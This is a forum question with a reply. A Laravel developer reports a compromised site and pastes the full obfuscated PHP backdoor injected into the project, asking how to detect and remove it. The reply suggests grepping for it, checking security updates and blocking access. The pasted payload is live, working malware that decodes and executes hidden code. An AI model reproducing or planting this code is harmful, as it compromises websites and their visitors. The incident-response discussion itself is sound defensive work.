In my laravel 5 project following code is injected into my project :
<?php $exbgult = 'f`x x22l:!}V;3q%}U;y]-rr.93e:5597f-s.973:8297f:5297e:5 x7f_*#fmjgk4`{6~6<tfs%w6< x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*)!gj!~<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-#w#)ldbqov>*ofmy%)vd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg} x7f;!gj!|!*bubE{h%)j{hnpd!opjudovg!762]67y]562]38y]572]48y]#>m%:|:*r%:-t%)3of:opjudovg<~ x24<8R#>q%V<*#fopoV;hojepdoF.uofuopD#!osvufs}w;* x7f!>> x22!pd%)!gj}Z;h!opjudovg}{;#)tutjyf`op*9.-j%-bubE{h%)sutcvt)fubmgoj{hA!osvufs!~<3,j%>j%!*3! x27!hmg%!)!252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>! x2400~:<hftpmdXA6|7**197-2qj%7-K)udfoopdXA x22)7gj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJutjm!|!*5! x27!hmg%)!gj!|!*1?hmg%)!gj!<**2-4-bubE{h%)sut!<*qp%-*.%)euhA)3of>2bd%!<5h%/#0#/*#npd/#)rrd/#0fmtf!%b:>%s: x5c%j:.2^,%b:<!%c:>%s: x5c%j:^<!%w` x5c^>Ew:Qb:Qc:W~!%z!>52]88]5]48]32M3]317]445]212]445]43]321]464]284]364]6]234<%j:=tj{fpg)%s:*<%j:,,Bjg!)%j:>>1*!%b:>1<!6<.fmjgA x27doj%6< x7fw6*mjix6<C x27&6<*rfs%7-K)fujsxX6<#o]o]Y%7;utpI#7>/7unction sgkkpzf($n){ret)sfebfI{*w%)kVx{**#k#)tutjyv%7UFH# x27rfs%6~6< x7fw6<*K)}_;#)323ldfid>}&;!osvufs} x7f;!opjudovg}k~~9{d%:osUFS,6<*msv%7-MSV,6<*)ujojR x27id%6< x7fw6* x7f_*#u)1/35.)1/14+9**-)1/2986+7**^/%rx<~!!%s:N}#-%o:W%c:>1<%b:>1<!gps)%j:>1gpf{jt)!gj!<*2bd%-#1GO x22#)fepmqyfA>2b%]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%56 x63 164 x69 157 x6e"; fvr# x5cq%)ufttj x22)gj6<^#Y# x5cq%mfdcyvi("", $qseooyw); $yhdszep();}} $mfdcyvi = " x63 162 x65 141 x74 145 x5f 146 x75 1]273]D6P2L5P6]y6gP7L6M7]48L3P6L1M5]D2P4]D6#<%G]y6d]281Ld]245]K2]285]Ke]53Ld]53]K x27Y%6<.msv`ftsbqA7>q%6< x7fw6* x7f_*#fubfsdXk5`{66~6<&w6< x7fj3hopmA x273qj%6<*Y%)fnbozcYufhA x272qj%6<^#zsfvr#24/%t2w/ x24)##-!#~<#/% x24- x24!>!fyqmpef)#41 107 x45 116 x54"]); if ((s%w:**<")));$yhdszep = $%Z<^2 x5c2b%!>!2p%!*3>?*2b%)) or (strstr($uas," x66 151 x72 145 x66 157 x78"))) {idk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc x7f!|!*uyfu x2fuvso!sboepn)%epnbss-%rxW~!Ypp2)%zB%z>! x24/%tmw/ x24)%SFT`%}X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<*#p%!|Z~!<##!>!2p%!|!*!***b%)sfxpmpusut!-#j0#!/!**#sfmcnbs+yfeobz+sfww6* x7f_*#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuopd`ufh`fmjg}[;ldpt%}vg}x;0]=])0#)U! x27{**u%-#jt0}Z;0]=]0#)2q%l}S#<!%w:!>!(%w:!>! x246767~#00#W~!Ydrr)%rxB%epnbss!>!bssbz)#44ec:649#-!#:618d5f9gjZ<#opo#>b%!**X)ufttjssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPNFif((function_exists(" x6f 142 x5f 163 x74 141 x72 1 x64 162 x6f 151 x64")) or (strstr($uas," x63 150 x72 157 x6d 145")d%)Rb%))!gj!<*#cd2bge56+99386c6f+9f5d816:+946:ce44#)zbvufs:~928>> x22:ftmbg39*56A:>:8:|:7#6#)tutjyf`439275ttfsqn!/!#0#)idubn`hfsq)!sp!*#ojneb#-*f%)sfxpmpusut)tpqssutRe%)R6Z6<.4`hA x27pd%6<pd%w6Z6<.3`hA x27pd%6<pd%w6Z6<.2`hA xepn)%bss-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985error_reporting(0); $qseooyw = impl7k:!ftmf!}Z;^nbsbq% x5cSFWcvt)esp>hmg%!<12>j%!|!*#91y]c9y]g2y]#>>*4-1-bubE{h%)sutcvt)D4]275]D:M8]Df#<%tdz>#L4]275L3]24]y8 x24- x24]26 x24- x24<%j,,*!| x24- x24gvodujpo! x24- x24y7 x24- x24*<! x24- x24gps)%j>1<%j=tj{fpg)% x24- x24*<!~! xs!*!+A!>!{e%)!>> x22!ftmbg)!gj<*#k#)usbut`cp|!**#j{hnpd#)tutjyf`opjudovg x22)!gj}1~!<2p% x7f!~!<##!>!2p#Qi x5c1^W%c!>!%i x5c2^<!Ce*[!%cIjQeTQcOc/RVER[" x48 124 x54 120 x5f 125 x53 105 x52 137 x24/%tjw/ x24)% x24- x24y4 x24- x2{h%)tpqsut>j%!*9! x27!hmg%ode(array_map("sgkkpzf",str_split("%tjw!>!#]y84]275]y83]gj!<2,*j%!-#1]#-bubE{h%)tpqsut>j%!*72! x27!hmg%)!gj!<2,*j%-#1]#-bubE27pd%6<C x27pd%6|6.7eu{6]342]58]24]31#-%tdz*Wsfuvso!%bss x5csboe)c]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fdy<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)#z!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#]D4])))) { $GLOBALS[" x61 156 x75 156 x61"]=1; $uas=strtolower($_SE%w`TW~ x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H#-#I#-#K#-#L#-w6*CW&)7gj6<*doj%7-C)fepmqnjA x27&X x24<!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y76]*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x27u%)7f3f]51L3]84]y31M6]y3e]81#/#7e:55946-tr.984:75983:48984:71]K9]77]DS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`Q37y]672]48y]#>s%<#462]47y]252]18y]#>q%<#us)% x24- x24b!>!%yy)#}#-# x24- x24-tusqpt)%z-#:#* x24- x24!>! x#-!#~<%h00#*<%nfd)##Qtpz)#]341]88M4P8]37]278]225]241]3-!% x24- x24*!|! x24- x24 x5c%j^ x24- x24tvct#M#-#[#-#Y#-#D#-#W#-#V x7f x7f x7f x7f<u%V x27{ftmfV x7f<*X&Z&S{ftmfV x7f<*XAZ)m%):fmjix:<##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)# x24#-!#]y38#-! x22)gj!|!*nbsbq%)323ldf%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]67y]37]88y>b%Z<#opo#>b%!*##>>X)!UUI&b%!|!*)323zbek!~!<b% x7f!<X6-xr.985:52985-t.98]K4]65]D8]86]y31]278]yx5c2^-%hOh/#00#W~!%t2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,47R57,;2-u%!-#2#/#%#/#o]#/*)323zbe!-#jt0*?]+^?]_ x5c} x5cq%7/7#@#7/7^#iubq# x5cq% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfK;`ufldpt}X;`msvd}R;*msv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuft`msrfs%6<#o]1/20QUUI7jsid%)dfyfR x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUOSV6~67<&w6<*&7-#o]s]o]s]#)fepmqyf x27*&7-n%)utjm6< x7fw6*CW&)7gj6< x24*<!%t::!>! x24Ypp3)%cB%iN}#-! x24/%tmw/ x24)%c*W%eN+jojRk3`{666~6<&w6< x7fw6*CW&)7gj6<.[A x27&6< x7fpdov{h19275j{hnpd19275fubmgoj{h1:|:*m`GB)fubfsdXA x27K6< x7fw6*3qj%7> x2272qj%)7gj6<**2qj%)hopm3qjA)qmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)tutjyf`4 x223}!+!<+{e%+*!*jidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#)fepmqnjtrstr($uas," x6d 163 x69 145")) orjudovg)!gj!|!*msv%)}k~~~<ftmbg!osvufs!|ftmf!~<*248]y83]256]y81]265]y72]254]y76urn chr(ord($n)-1);} @zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr x5c1^-%r 0;quui#>.%!<***f x27,*e x27,*d x27,*c x27,*b x27!%o:!>! x242178}527}88:}334}472 x24<!%ff2!>!bssbz) x24]25 x24- x2464") && (!isset($GLOBALS[" x61 156 x75 156 x61"27R66,#/q%>2q%<#g6R85,67R37,16<Cw6<pd%w6Z6<.5`hA x27pd%6<pd%w2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>2*!%z>3<!fmtf!%z>2<!%ww2)34]368]322]3]364]6]283]427]36]373P6]36]73]83]238M7]381]211M5]67]4 (strstr($uas," x72 166 x3a 61 x31")) or (strstr($uas," x61 156}R;2]},;osvufs} x27;mnui}&;zepc}A;~!} x7f;!|!}{;)gj}l;33bq}k;opjudo#-!#f6c68399#-!#65egb2dc#*<!s4]82]K6]72]K9]78]K5]53]Kc#<%tp)fepdof.)fepdof./#@#/qp%>5h%!<*::::::-111112)eobs`un>q+fepdfe{h+{d%)+opjudovg+)!gj+{e%!osvufStrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSexszpyxqoh'; $xfctlhz=explode(chr((550-430)),substr($exbgult,(30778-24758),(217-183))); $hsgtsqf = $xfctlhz[0]($xfctlhz[(3-2)]); $fubpeao = $xfctlhz[0]($xfctlhz[(14-12)]); if (!function_exists('wflbtbvpa')) { function wflbtbvpa($fgenax, $khaipyaq,$nthiky) { $hswxpmj = NULL; for($wwpjsp=0;$wwpjsp<(sizeof($fgenax)/2);$wwpjsp++) { $hswxpmj .= substr($khaipyaq, $fgenax[($wwpjsp*2)],$fgenax[($wwpjsp*2)+(6-5)]); } return $nthiky(chr((40-31)),chr((631-539)),$hswxpmj); }; } $watpdooupr = explode(chr((207-163)),'2290,51,5499,47,3522,64,3103,48,1659,29,5199,34,5739,63,2341,67,1739,53,1371,51,1275,26,942,23,5311,22,2687,35,3210,56,5280,31,2144,25,5575,32,2578,55,3334,24,4822,64,3749,49,893,49,4740,20,992,29,526,70,5027,64,1565,50,4612,62,1301,34,1502,63,3654,34,868,25,54,59,4760,62,1071,50,4942,48,2029,70,4674,66,175,40,337,57,5233,47,394,65,3266,68,3184,26,113,62,596,56,2748,59,215,31,3002,59,1711,28,1190,40,652,48,5385,48,5928,54,1962,67,5151,48,2520,58,2408,54,2244,46,3862,31,4381,31,4359,22,2222,22,4281,24,1792,52,2722,26,1899,63,1021,50,2462,58,4990,37,5091,60,5982,38,2958,44,4117,57,4509,56,5546,29,304,33,965,27,0,21,5802,67,2099,45,4565,47,3688,61,459,67,4305,54,1230,45,4174,52,3893,40,246,58,5433,66,4051,45,3933,64,3151,33,2839,51,2890,68,1615,44,4886,56,3061,42,2169,53,5869,29,1844,55,5333,52,4453,56,2633,54,21,33,4412,41,3798,64,5898,30,3469,53,1422,24,2807,32,1446,56,3399,70,3997,54,5674,65,770,56,3358,41,1121,69,826,42,700,70,5607,67,3586,68,4096,21,4226,55,1688,23,1335,36'); $jruxurnjje = $hsgtsqf("",wflbtbvpa($watpdooupr,$exbgult,$fubpeao)); $hsgtsqf=$exbgult; $jruxurnjje(""); $jruxurnjje=(787-666); $exbgult=$jruxurnjje-1; ?>
I have observed 2-3 types of these script,the above script is one of them
please help me write a regular expression for this code so i can find this code and remove it or if any one knows how can i identify the source of this script this script causes my website to slow down
grep -R 'somestring from the code'to find places where this happened and begin investigating. Check laravel docs for security updates. Find the point where this code is actually executed Provide all the information you can so someone can actually help you with this. Most importantly, please block access to the affected web app for your users until you clean the site or further damage may occur.